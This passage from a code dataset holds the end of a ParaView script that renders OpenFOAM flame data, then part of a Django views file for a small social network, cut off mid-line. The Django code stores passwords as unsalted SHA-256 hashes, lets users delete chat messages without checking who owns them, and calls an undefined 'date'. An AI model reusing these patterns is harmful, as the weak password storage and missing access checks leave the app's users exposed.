'p']\nclip3Display.LookupTable = pLUT\nclip3Display.OSPRayScaleArray = 'p'\nclip3Display.OSPRayScaleFunction = 'PiecewiseFunction'\nclip3Display.SelectOrientationVectors = 'U'\nclip3Display.ScaleFactor = 0.02100000083446503\nclip3Display.SelectScaleArray = 'p'\nclip3Display.GlyphType = 'Arrow'\nclip3Display.GlyphTableIndexArray = 'p'\nclip3Display.DataAxesGrid = 'GridAxesRepresentation'\nclip3Display.PolarAxes = 'PolarAxesRepresentation'\nclip3Display.ScalarOpacityFunction = pPWF\nclip3Display.ScalarOpacityUnitDistance = 0.002455609039883639\nclip3Display.GaussianRadius = 0.010500000417232515\nclip3Display.SetScaleArray = ['POINTS', 'p']\nclip3Display.ScaleTransferFunction = 'PiecewiseFunction'\nclip3Display.OpacityArray = ['POINTS', 'p']\nclip3Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(clip2, renderView1)\n\n# show color bar/color legend\nclip3Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# create a new 'Clip'\nclip4 = Clip(Input=clip3)\nclip4.ClipType = 'Plane'\nclip4.Scalars = ['POINTS', 'p']\nclip4.Value = 101426.88671875\n\n# init the 'Plane' selected for 'ClipType'\nclip4.ClipType.Origin = [0.0, 0.027500001713633537, 0.029999999329447746]\n\n# Properties modified on clip4.ClipType\nclip4.ClipType.Origin = [0.0, 0.05, 0.029999999329447746]\nclip4.ClipType.Normal = [0.0, -1.0, 0.0]\n\n# Properties modified on clip4.ClipType\nclip4.ClipType.Origin = [0.0, 0.05, 0.029999999329447746]\nclip4.ClipType.Normal = [0.0, -1.0, 0.0]\n\n# show data in view\nclip4Display = Show(clip4, renderView1)\n# trace defaults for the display properties.\nclip4Display.Representation = 'Surface'\nclip4Display.ColorArrayName = ['POINTS', 'p']\nclip4Display.LookupTable = pLUT\nclip4Display.OSPRayScaleArray = 'p'\nclip4Display.OSPRayScaleFunction = 'PiecewiseFunction'\nclip4Display.SelectOrientationVectors = 'U'\nclip4Display.ScaleFactor = 0.02100000083446503\nclip4Display.SelectScaleArray = 'p'\nclip4Display.GlyphType = 'Arrow'\nclip4Display.GlyphTableIndexArray = 'p'\nclip4Display.DataAxesGrid = 'GridAxesRepresentation'\nclip4Display.PolarAxes = 'PolarAxesRepresentation'\nclip4Display.ScalarOpacityFunction = pPWF\nclip4Display.ScalarOpacityUnitDistance = 0.0022892767869242786\nclip4Display.GaussianRadius = 0.010500000417232515\nclip4Display.SetScaleArray = ['POINTS', 'p']\nclip4Display.ScaleTransferFunction = 'PiecewiseFunction'\nclip4Display.OpacityArray = ['POINTS', 'p']\nclip4Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(clip3, renderView1)\n\n# show color bar/color legend\nclip4Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# create a new 'Clip'\nclip5 = Clip(Input=clip4)\nclip5.ClipType = 'Plane'\nclip5.Scalars = ['POINTS', 'p']\nclip5.Value = 101426.88671875\n\n# init the 'Plane' selected for 'ClipType'\nclip5.ClipType.Origin = [0.0, 0.0, 0.029999999329447746]\n\n# Properties modified on clip5.ClipType\nclip5.ClipType.Normal = [0.0, 1.0, 0.0]\n\n# Properties modified on clip5.ClipType\nclip5.ClipType.Normal = [0.0, 1.0, 0.0]\n\n# show data in view\nclip5Display = Show(clip5, renderView1)\n# trace defaults for the display properties.\nclip5Display.Representation = 'Surface'\nclip5Display.ColorArrayName = ['POINTS', 'p']\nclip5Display.LookupTable = pLUT\nclip5Display.OSPRayScaleArray = 'p'\nclip5Display.OSPRayScaleFunction = 'PiecewiseFunction'\nclip5Display.SelectOrientationVectors = 'U'\nclip5Display.ScaleFactor = 0.02100000083446503\nclip5Display.SelectScaleArray = 'p'\nclip5Display.GlyphType = 'Arrow'\nclip5Display.GlyphTableIndexArray = 'p'\nclip5Display.DataAxesGrid = 'GridAxesRepresentation'\nclip5Display.PolarAxes = 'PolarAxesRepresentation'\nclip5Display.ScalarOpacityFunction = pPWF\nclip5Display.ScalarOpacityUnitDistance = 0.0027158731921682337\nclip5Display.GaussianRadius = 0.010500000417232515\nclip5Display.SetScaleArray = ['POINTS', 'p']\nclip5Display.ScaleTransferFunction = 'PiecewiseFunction'\nclip5Display.OpacityArray = ['POINTS', 'p']\nclip5Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(clip4, renderView1)\n\n# show color bar/color legend\nclip5Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# create a new 'Slice'\nslice1 = Slice(Input=clip5)\nslice1.SliceType = 'Plane'\nslice1.SliceOffsetValues = [0.0]\n\n# init the 'Plane' selected for 'SliceType'\nslice1.SliceType.Origin = [0.0, 0.02500000037252903, 0.029999999329447746]\n\n# toggle 3D widget visibility (only when running from the GUI)\nHide3DWidgets(proxy=slice1.SliceType)\n\n# show data in view\nslice1Display = Show(slice1, renderView1)\n# trace defaults for the display properties.\nslice1Display.Representation = 'Surface'\nslice1Display.ColorArrayName = ['POINTS', 'p']\nslice1Display.LookupTable = pLUT\nslice1Display.OSPRayScaleArray = 'p'\nslice1Display.OSPRayScaleFunction = 'PiecewiseFunction'\nslice1Display.SelectOrientationVectors = 'U'\nslice1Display.ScaleFactor = 0.01799999959766865\nslice1Display.SelectScaleArray = 'p'\nslice1Display.GlyphType = 'Arrow'\nslice1Display.GlyphTableIndexArray = 'p'\nslice1Display.DataAxesGrid = 'GridAxesRepresentation'\nslice1Display.PolarAxes = 'PolarAxesRepresentation'\nslice1Display.GaussianRadius = 0.008999999798834325\nslice1Display.SetScaleArray = ['POINTS', 'p']\nslice1Display.ScaleTransferFunction = 'PiecewiseFunction'\nslice1Display.OpacityArray = ['POINTS', 'p']\nslice1Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(clip5, renderView1)\n\n# show color bar/color legend\nslice1Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# set active source\nSetActiveSource(clip4)\n\n# create a new 'Clip'\nclip6 = Clip(Input=clip4)\nclip6.ClipType = 'Plane'\nclip6.Scalars = ['POINTS', 'p']\nclip6.Value = 101426.88671875\n\n# init the 'Plane' selected for 'ClipType'\nclip6.ClipType.Origin = [0.0, 0.0, 0.029999999329447746]\n\n# set active source\nSetActiveSource(clip6)\n\n# show data in view\nclip6Display = Show(clip6, renderView1)\n# trace defaults for the display properties.\nclip6Display.Representation = 'Surface'\nclip6Display.ColorArrayName = ['POINTS', 'p']\nclip6Display.LookupTable = pLUT\nclip6Display.OSPRayScaleArray = 'p'\nclip6Display.OSPRayScaleFunction = 'PiecewiseFunction'\nclip6Display.SelectOrientationVectors = 'U'\nclip6Display.ScaleFactor = 0.01799999959766865\nclip6Display.SelectScaleArray = 'p'\nclip6Display.GlyphType = 'Arrow'\nclip6Display.GlyphTableIndexArray = 'p'\nclip6Display.DataAxesGrid = 'GridAxesRepresentation'\nclip6Display.PolarAxes = 'PolarAxesRepresentation'\nclip6Display.ScalarOpacityFunction = pPWF\nclip6Display.ScalarOpacityUnitDistance = 0.0022417471510480427\nclip6Display.GaussianRadius = 0.008999999798834325\nclip6Display.SetScaleArray = ['POINTS', 'p']\nclip6Display.ScaleTransferFunction = 'PiecewiseFunction'\nclip6Display.OpacityArray = ['POINTS', 'p']\nclip6Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# show color bar/color legend\nclip6Display.SetScalarBarVisibility(renderView1, True)\n\n# Properties modified on clip6.ClipType\nclip6.ClipType.Normal = [0.0, -1.0, 0.0]\n\n# Properties modified on clip6.ClipType\nclip6.ClipType.Normal = [0.0, -1.0, 0.0]\n\n# show data in view\nclip6Display = Show(clip6, renderView1)\n\n# hide data in view\nHide(clip4, renderView1)\n\n# show color bar/color legend\nclip6Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# create a new 'Slice'\nslice2 = Slice(Input=clip6)\nslice2.SliceType = 'Plane'\nslice2.SliceOffsetValues = [0.0]\n\n# init the 'Plane' selected for 'SliceType'\nslice2.SliceType.Origin = [0.0, -0.02500000037252903, 0.029999999329447746]\n\n# show data in view\nslice2Display = Show(slice2, renderView1)\n# trace defaults for the display properties.\nslice2Display.Representation = 'Surface'\nslice2Display.ColorArrayName = ['POINTS', 'p']\nslice2Display.LookupTable = pLUT\nslice2Display.OSPRayScaleArray = 'p'\nslice2Display.OSPRayScaleFunction = 'PiecewiseFunction'\nslice2Display.SelectOrientationVectors = 'U'\nslice2Display.ScaleFactor = 0.01799999959766865\nslice2Display.SelectScaleArray = 'p'\nslice2Display.GlyphType = 'Arrow'\nslice2Display.GlyphTableIndexArray = 'p'\nslice2Display.DataAxesGrid = 'GridAxesRepresentation'\nslice2Display.PolarAxes = 'PolarAxesRepresentation'\nslice2Display.GaussianRadius = 0.008999999798834325\nslice2Display.SetScaleArray = ['POINTS', 'p']\nslice2Display.ScaleTransferFunction = 'PiecewiseFunction'\nslice2Display.OpacityArray = ['POINTS', 'p']\nslice2Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(clip6, renderView1)\n\n# show color bar/color legend\nslice2Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# toggle 3D widget visibility (only when running from the GUI)\nHide3DWidgets(proxy=slice2.SliceType)\n\n# set active source\nSetActiveSource(slice1)\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# set scalar coloring\nColorBy(slice1Display, ('POINTS', 'T'))\n\n# Hide the scalar bar for this color map if no visible data is colored by it.\nHideScalarBarIfNotNeeded(pLUT, renderView1)\n\n# rescale color and/or opacity maps used to include current data range\nslice1Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\nslice1Display.SetScalarBarVisibility(renderView1, True)\n\n# get color transfer function/color map for 'T'\ntLUT = GetColorTransferFunction('T')\ntLUT.RGBPoints = [298.0, 0.231373, 0.298039, 0.752941, 1256.1572265625, 0.865003, 0.865003, 0.865003, 2214.314453125, 0.705882, 0.0156863, 0.14902]\ntLUT.ScalarRangeInitialized = 1.0\n\n# set active source\nSetActiveSource(slice2)\n\n# set scalar coloring\nColorBy(slice2Display, ('POINTS', 'TMean'))\n\n# Hide the scalar bar for this color map if no visible data is colored by it.\nHideScalarBarIfNotNeeded(pLUT, renderView1)\n\n# rescale color and/or opacity maps used to include current data range\nslice2Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\nslice2Display.SetScalarBarVisibility(renderView1, True)\n\n# get color transfer function/color map for 'TMean'\ntMeanLUT = GetColorTransferFunction('TMean')\ntMeanLUT.RGBPoints = [298.0, 0.231373, 0.298039, 0.752941, 1194.8056640625, 0.865003, 0.865003, 0.865003, 2091.611328125, 0.705882, 0.0156863, 0.14902]\ntMeanLUT.ScalarRangeInitialized = 1.0\n\n# create a new 'Temporal Statistics'\ntemporalStatistics1 = TemporalStatistics(Input=slice2)\n\n# Properties modified on temporalStatistics1\ntemporalStatistics1.ComputeMinimum = 0\ntemporalStatistics1.ComputeMaximum = 0\ntemporalStatistics1.ComputeStandardDeviation = 0\n\n# show data in view\ntemporalStatistics1Display = Show(temporalStatistics1, renderView1)\n# trace defaults for the display properties.\ntemporalStatistics1Display.Representation = 'Surface'\ntemporalStatistics1Display.ColorArrayName = [None, '']\ntemporalStatistics1Display.OSPRayScaleArray = 'CH4Mean_average'\ntemporalStatistics1Display.OSPRayScaleFunction = 'PiecewiseFunction'\ntemporalStatistics1Display.SelectOrientationVectors = 'CH4Mean_average'\ntemporalStatistics1Display.ScaleFactor = 0.01799999959766865\ntemporalStatistics1Display.SelectScaleArray = 'CH4Mean_average'\ntemporalStatistics1Display.GlyphType = 'Arrow'\ntemporalStatistics1Display.GlyphTableIndexArray = 'CH4Mean_average'\ntemporalStatistics1Display.DataAxesGrid = 'GridAxesRepresentation'\ntemporalStatistics1Display.PolarAxes = 'PolarAxesRepresentation'\ntemporalStatistics1Display.GaussianRadius = 0.008999999798834325\ntemporalStatistics1Display.SetScaleArray = ['POINTS', 'CH4Mean_average']\ntemporalStatistics1Display.ScaleTransferFunction = 'PiecewiseFunction'\ntemporalStatistics1Display.OpacityArray = ['POINTS', 'CH4Mean_average']\ntemporalStatistics1Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(slice2, renderView1)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# set scalar coloring\nColorBy(temporalStatistics1Display, ('POINTS', 'TMean_average'))\n\n# rescale color and/or opacity maps used to include current data range\ntemporalStatistics1Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\ntemporalStatistics1Display.SetScalarBarVisibility(renderView1, True)\n\n# get color transfer function/color map for 'TMean_average'\ntMean_averageLUT = GetColorTransferFunction('TMean_average')\ntMean_averageLUT.RGBPoints = [298.0, 0.231373, 0.298039, 0.752941, 1189.994873046875, 0.865003, 0.865003, 0.865003, 2081.98974609375, 0.705882, 0.0156863, 0.14902]\ntMean_averageLUT.ScalarRangeInitialized = 1.0\n\n# set scalar coloring\nColorBy(temporalStatistics1Display, ('POINTS', 'UMean_average', 'Magnitude'))\n\n# Hide the scalar bar for this color map if no visible data is colored by it.\nHideScalarBarIfNotNeeded(tMean_averageLUT, renderView1)\n\n# rescale color and/or opacity maps used to include current data range\ntemporalStatistics1Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\ntemporalStatistics1Display.SetScalarBarVisibility(renderView1, True)\n\n# get color transfer function/color map for 'UMean_average'\nuMean_averageLUT = GetColorTransferFunction('UMean_average')\nuMean_averageLUT.RGBPoints = [0.0, 0.231373, 0.298039, 0.752941, 19.858241780686676, 0.865003, 0.865003, 0.865003, 39.71648356137335, 0.705882, 0.0156863, 0.14902]\nuMean_averageLUT.ScalarRangeInitialized = 1.0\n\n# set scalar coloring\nColorBy(temporalStatistics1Display, ('POINTS', 'UMean_average', 'Z'))\n\n# rescale color and/or opacity maps used to exactly fit the current data range\ntemporalStatistics1Display.RescaleTransferFunctionToDataRange(False, False)\n\n# Update a scalar bar component title.\nUpdateScalarBarsComponentTitle(uMean_averageLUT, temporalStatistics1Display)\n\n# set active source\nSetActiveSource(slice1)\n\n# set scalar coloring\nColorBy(slice1Display, ('POINTS', 'U', 'Magnitude'))\n\n# Hide the scalar bar for this color map if no visible data is colored by it.\nHideScalarBarIfNotNeeded(tLUT, renderView1)\n\n# rescale color and/or opacity maps used to include current data range\nslice1Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\nslice1Display.SetScalarBarVisibility(renderView1, True)\n\n# get color transfer function/color map for 'U'\nuLUT = GetColorTransferFunction('U')\nuLUT.RGBPoints = [0.0, 0.231373, 0.298039, 0.752941, 19.061934160671782, 0.865003, 0.865003, 0.865003, 38.123868321343565, 0.705882, 0.0156863, 0.14902]\nuLUT.ScalarRangeInitialized = 1.0\n\n# set scalar coloring\nColorBy(slice1Display, ('POINTS', 'U', 'Z'))\n\n# rescale color and/or opacity maps used to exactly fit the current data range\nslice1Display.RescaleTransferFunctionToDataRange(False, False)\n\n# Update a scalar bar component title.\nUpdateScalarBarsComponentTitle(uLUT, slice1Display)\n\n# current camera placement for renderView1\nrenderView1.CameraPosition = [-0.39779259664765326, 0.0, 0.029999999329447746]\nrenderView1.CameraFocalPoint = [0.0, 0.0, 0.029999999329447746]\nrenderView1.CameraViewUp = [0.0, 0.0, 1.0]\nrenderView1.CameraParallelScale = 0.1029563000131978\n\n# save screenshot\nSaveScreenshot('snapshot_U_UMean_Z.png', renderView1, ImageResolution=[2199, 1890])\n\n# set scalar coloring\nColorBy(slice1Display, ('POINTS', 'T'))\n\n# Hide the scalar bar for this color map if no visible data is colored by it.\nHideScalarBarIfNotNeeded(uLUT, renderView1)\n\n# rescale color and/or opacity maps used to include current data range\nslice1Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\nslice1Display.SetScalarBarVisibility(renderView1, True)\n\n# set active source\nSetActiveSource(temporalStatistics1)\n\n# set scalar coloring\nColorBy(temporalStatistics1Display, ('POINTS', 'TMean_average'))\n\n# Hide the scalar bar for this color map if no visible data is colored by it.\nHideScalarBarIfNotNeeded(uMean_averageLUT, renderView1)\n\n# rescale color and/or opacity maps used to include current data range\ntemporalStatistics1Display.RescaleTransferFunctionToDataRange(True, False)\n\n# show color bar/color legend\ntemporalStatistics1Display.SetScalarBarVisibility(renderView1, True)\n\n# set active source\nSetActiveSource(slice1)\n\nanimationScene1.GoToLast()\n\n# current camera placement for renderView1\nrenderView1.CameraPosition = [-0.39779259664765326, 0.0, 0.029999999329447746]\nrenderView1.CameraFocalPoint = [0.0, 0.0, 0.029999999329447746]\nrenderView1.CameraViewUp = [0.0, 0.0, 1.0]\nrenderView1.CameraParallelScale = 0.1029563000131978\n\n# save screenshot\nSaveScreenshot('snapshot_T_TMean.png', renderView1, ImageResolution=[2199, 1890])\n\n#### saving camera placements for all active views\n\n# current camera placement for renderView1\nrenderView1.CameraPosition = [-0.39779259664765326, 0.0, 0.029999999329447746]\nrenderView1.CameraFocalPoint = [0.0, 0.0, 0.029999999329447746]\nrenderView1.CameraViewUp = [0.0, 0.0, 1.0]\nrenderView1.CameraParallelScale = 0.1029563000131978\n\n#### uncomment the following to render all views\n# RenderAllViews()\n# alternatively, if you want to write images, you can use SaveScreenshot(...).\n","repo_name":"Combustion-Zhen/OpenFOAM_py","sub_path":"SwB/snapshot_Mean.py","file_name":"snapshot_Mean.py","file_ext":"py","file_size_in_byte":24135,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"21724265818","text":"from django.views.generic import UpdateView\nfrom django.views.generic.edit import CreateView\nfrom django.views.generic.base import TemplateView\nfrom django.views.generic.list import ListView\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import redirect\nfrom django.db import IntegrityError\nfrom django.urls import reverse\nfrom django.db.models import Count, Q\nfrom django.utils import timezone\nimport datetime\nimport pytz\nfrom django.db.models import Count\nfrom operator import attrgetter\n\nfrom .models import User, Post, Report, Tag, Follow, Chat, Message, Comment\nfrom .commentcode import add_comment\nfrom .getposts import get_posts\nfrom .deleteuser import delete_user\nfrom .tagcode import addtag, removetag\nfrom .followcode import addFollow, removeFollow, getFollowers, getFollowing, deleteFollow\nfrom .timelinecode import timeline_by_tag, get_timeline_posts, timeline_by_text, timeline_by_date, timeline_by_trending\nfrom .postrequestcode import post_request_from_post\nfrom .chatcode import createChat, addUser, removeUser, createMessage, deleteMessage, getChats, deleteChat\n\nimport hashlib\nimport pyotp\n\nclass LoginView(TemplateView):\n template_name = \"login/login.html\"\n\n\nclass RegisterView(TemplateView):\n template_name = \"login/register.html\"\n\n def post(self, request):\n name = request.POST.get('nameinput', None)\n firstname, lastname = name.split()\n username = request.POST.get('usernameinput', None)\n email = request.POST.get('emailinput', None)\n password = request.POST.get('passwordinput', None)\n password_confirm = request.POST.get('confirmpasswordinput', None)\n enc_password = encrypt_string(password)\n\n user = User(firstname=firstname, lastname=lastname, username=username, email=email,\n password=enc_password)\n\n # TODO validate all fields exist & are valid\n\n try:\n user.save()\n except IntegrityError:\n # TODO tell user username/email is already taken\n return redirect('register')\n\n request.session['userid'] = user.pk\n\n return redirect('mainpage')\n\n\nclass MainPageView(TemplateView):\n template_name = \"mainpage.html\"\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n user = User.objects.get(pk=self.request.session['userid'])\n context = super(MainPageView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n context['user'] = user\n context['follows'] = getFollowing(self.request.session['userid'])\n if 'word_search' in self.request.GET:\n word = self.request.GET.get('word_search',None)\n context['posts'] = timeline_by_text(user,word)\n elif 'date_search' in self.request.GET:\n date = self.request.GET.get('date_search',None)\n #date_array = given.split('/')\n #date = date_array[2] + \"-\" + date_array[0] + \"-\" + date_array[1]\n context['posts'] = timeline_by_date(user,date)\n elif 'tag_search' in self.request.GET:\n tag_name = self.request.GET.get('tag_search',None)\n print('context 3')\n print(tag_name)\n context['posts'] = timeline_by_tag(user,tag_name)\n elif 'trending' in self.request.GET:\n print('context 4')\n context['posts'] = timeline_by_trending(user)\n else:\n print('context 5')\n context['posts'] = get_timeline_posts(user)\n user.prev_time_line_view = user.curr_time_line_view\n user.curr_time_line_view = timezone.now()\n user.save()\n return context\n\n def post(self,request):\n print(request)\n post_request_from_post(self,request)\n return redirect('mainpage')\n\n\n\nclass SettingsPageView(UpdateView):\n template_name_suffix = '_update_form'\n model = User\n fields = ['firstname', 'lastname', 'username', 'email', 'password', 'private']\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n\n def get_object(self, queryset=None):\n try:\n return User.objects.get(pk=self.request.session['userid'])\n except User.DoesNotExist:\n return None\n\n def get_context_data(self, **kwargs):\n context = super(SettingsPageView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n return context\n\n def post(self, request):\n print(request.POST)\n if 'delete_user' in request.POST:\n delete_user(self.request.session.get('userid'))\n return redirect('login')\n if 'username_change' in request.POST:\n user = User.objects.get(pk=self.request.session['userid'])\n user.username = request.POST.get(\"username\")\n user.save()\n return redirect('settingspage')\n if 'email_change' in request.POST:\n user = User.objects.get(pk=self.request.session['userid'])\n user.email = request.POST.get(\"email\")\n user.save()\n return redirect('settingspage')\n if 'password_change' in request.POST:\n user = User.objects.get(pk=self.request.session['userid'])\n user.password = encrypt_string(request.POST.get(\"password\"))\n user.save()\n return redirect('settingspage')\n if 'private_change' in request.POST:\n user = User.objects.get(pk=self.request.session['userid'])\n user.private = 'private' in request.POST\n user.save()\n return redirect('settingspage')\n if 'chat_privacy' in request.POST:\n user = User.objects.get(pk=self.request.session['userid'])\n user.chat_privacy = request.POST.get(\"chat_privacy\")\n user.save()\n return redirect('settingspage')\n\n\nclass ProfilePageView(UpdateView):\n template_name_suffix = '_profile_page'\n model = User\n fields = ['firstname', 'lastname', 'username', 'email', 'password']\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n\n def get_object(self, queryset=None):\n return User.objects.get(pk=self.kwargs['pk'])\n\n def post(self, request, pk):\n post_request_from_post(self, request)\n return redirect(reverse('userprofilepage', kwargs={'pk': self.kwargs['pk']}))\n\n def get_context_data(self, **kwargs):\n context = super(ProfilePageView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n context['following_list'] = getFollowing(context['user'].id)\n context['follower_list'] = getFollowers(context['user'].id)\n context['logged_in_user'] = User.objects.get(id=self.request.session.get('userid', None))\n context['follows_me'] = context['user'].followings.filter(following__id = context['userid']).exists()\n return context\n\nclass BannedView(TemplateView):\n template_name = \"banned.html\"\n\nclass ChatView(TemplateView):\n template_name = \"chatpage.html\"\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n \n def get_context_data(self, **kwargs):\n context = super(TemplateView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n context['chat'] = Chat.objects.get(id=self.kwargs['pk'])\n context['all_chats'] = getChats(self.request.session.get('userid', None))\n return context\n\n def post(self, request, pk):\n print(request.POST)\n if 'add_member' in request.POST:\n try:\n user_id = User.objects.get(username=request.POST.get('add_member', None)).id\n addUser(pk,user_id)\n except:\n print(\"Invalid User Request\")\n if 'remove_member' in request.POST:\n try:\n user_id = User.objects.get(username=request.POST.get('remove_member', None)).id\n user = self.request.session.get('userid', None)\n if user_id != user:\n removeUser(pk,user_id)\n except:\n print(\"Invalid User Request\")\n if 'delete_chat' in request.POST:\n user = self.request.session.get('userid', None)\n deleteChat(pk, user)\n return redirect('chatnavpage')\n if 'leave_chat' in request.POST:\n user = self.request.session.get('userid', None)\n removeUser(pk, user)\n return redirect('chatnavpage')\n if 'delete_message' in request.POST:\n message_id = request.POST.get('delete_message', None)\n deleteMessage(message_id)\n if 'postinput' in request.POST:\n user_id = self.request.session.get('userid', None)\n content = username=request.POST.get('postinput', None)\n image = request.FILES.get('image', None)\n print(request.FILES)\n if len(content) != 0:\n createMessage(user_id, content, pk, image)\n return redirect('chatviewpage', pk=pk)\n\nclass ChatNavView(TemplateView):\n template_name = \"chatnav.html\"\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n \n def get_context_data(self, **kwargs):\n context = super(TemplateView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n context['all_chats'] = getChats(self.request.session.get('userid', None))\n return context\n\n def post(self, request):\n if 'create_chat' in request.POST:\n name = request.POST.get('create_chat', None)\n chat = createChat(name, self.request.session.get('userid', None))\n return redirect('chatviewpage', pk=chat.id)\n\nclass MakePostView(TemplateView):\n template_name = \"makepostpage.html\"\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(MakePostView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n return context\n\n def post(self, request):\n tags = request.POST.get('taginput', None).split(\",\")\n content = request.POST.get('postinput', None)\n image = request.FILES.get('image', None)\n user = User.objects.get(id=self.request.session.get('userid'))\n private = 'private' in request.POST\n if not content and not image:\n # TODO: report error\n return redirect('mainpage')\n post = Post(content=content, creator=user, image=image, private=private)\n post.save()\n for tag in tags:\n addtag(tag, post)\n return redirect('mainpage')\n\nclass SearchView(TemplateView):\n template_name = \"searchpage.html\"\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(SearchView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n return context\n\n def post(self, request):\n user_name = request.POST.get('searchinput', None)\n try:\n user = User.objects.get(username=user_name)\n except User.DoesNotExist:\n return redirect('searchpage')\n return redirect(reverse('userprofilepage', kwargs={'pk': user.pk}))\n\n\nclass FriendView(TemplateView):\n template_name = \"friend_page_profile.html\"\n\nclass UserSearchView(TemplateView):\n template_name = \"user_search_page.html\"\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n \n def get_context_data(self, **kwargs):\n context = super(TemplateView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n return context\n\nclass UserSearchResultView(ListView):\n template_name = \"user_search_result_page.html\"\n model = Post\n\n def dispatch(self, *args, **kwargs):\n if self.request.session['userid'] is None:\n return redirect('login')\n else:\n return super().dispatch(*args, **kwargs)\n\n def get_queryset(self, **kwargs):\n if 'word_search' in self.request.GET:\n post_content = self.request.GET.get('word_search')\n return Post.objects.filter(content__icontains=post_content)\n\n if 'tag_search' in self.request.GET:\n post_tag = self.request.GET.get('tag_search')\n return Post.objects.filter(tag__name=post_tag)\n\n if 'user_search' in self.request.GET:\n post_user = self.request.GET.get('user_search')\n try:\n user_id = User.objects.get(username=post_user).id\n except:\n return None\n return Post.objects.filter(creator=user_id)\n\n if 'name_search' in self.request.GET:\n post_user = self.request.GET.get('name_search')\n name = post_user.split(\" \")\n if len(name) is 1:\n return Post.objects.filter(Q(creator__firstname__icontains=name[0]) | Q(creator__lastname__icontains=name[0]))\n else:\n return Post.objects.filter(Q(creator__firstname__icontains=name[0]) | Q(creator__lastname__icontains=name[0]) | Q(creator__firstname__icontains=name[1]) | Q(creator__lastname__icontains=name[1]))\n\n if 'tag_user_search' in self.request.GET:\n post_combo = self.request.GET.get('tag_user_search')\n split_combo = post_combo.split('/')\n try:\n user_id = User.objects.get(username=split_combo[1]).id\n return Post.objects.filter(tag__name=split_combo[0],creator=user_id)\n except:\n return None\n if 'date_search' in self.request.GET:\n given = self.request.GET.get('date_search')\n date_array = given.split('/')\n #date = date_array[2] + \"-\" + date_array[0] + \"-\" + date_array[1]\n try:\n return Post.objects.filter(created__contains=datetime.date(int(date_array[2]), int(date_array[0]), int(date_array[1])))\n except:\n return None\n \n if 'top_tag_search' in self.request.GET:\n tag = self.request.GET.get('top_tag_search')\n top_posts = Post.objects.filter(tag__name=tag).annotate(t_count=Count('likers')).order_by('-t_count')\n return top_posts\n\n if 'trending' in self.request.GET:\n return Post.objects.all().annotate(num_likes=Count('likers')).order_by('-num_likes')\n\n def get_context_data(self, **kwargs):\n context = super(ListView, self).get_context_data(**kwargs)\n context['userid'] = self.request.session.get('userid', None)\n return context\n\n\n def post(self, request):\n post_request_from_post(self, request)\n return redirect('mainpage')\n\ndef encrypt_string(string):\n return hashlib.sha256(string.encode()).hexdigest()\n\n\ndef my_authenticate(username, password):\n password = encrypt_string(password)\n query = User.objects.filter(username=username) | User.objects.filter(email=username)\n if query.exists() and query[0].password == password:\n return query[0]\n else:\n return None\n\ndef login_user(request):\n username = request.POST.get('usernameinput', None)\n password = request.POST.get('passwordinput', None)\n otp_code = request.POST.get('otpinput', None)\n user = my_authenticate(username, password)\n if user is not None:\n if user.banned_until is not None and user.banned_until > date.today():\n return redirect('banned')\n if user.otp_secret:\n totp = 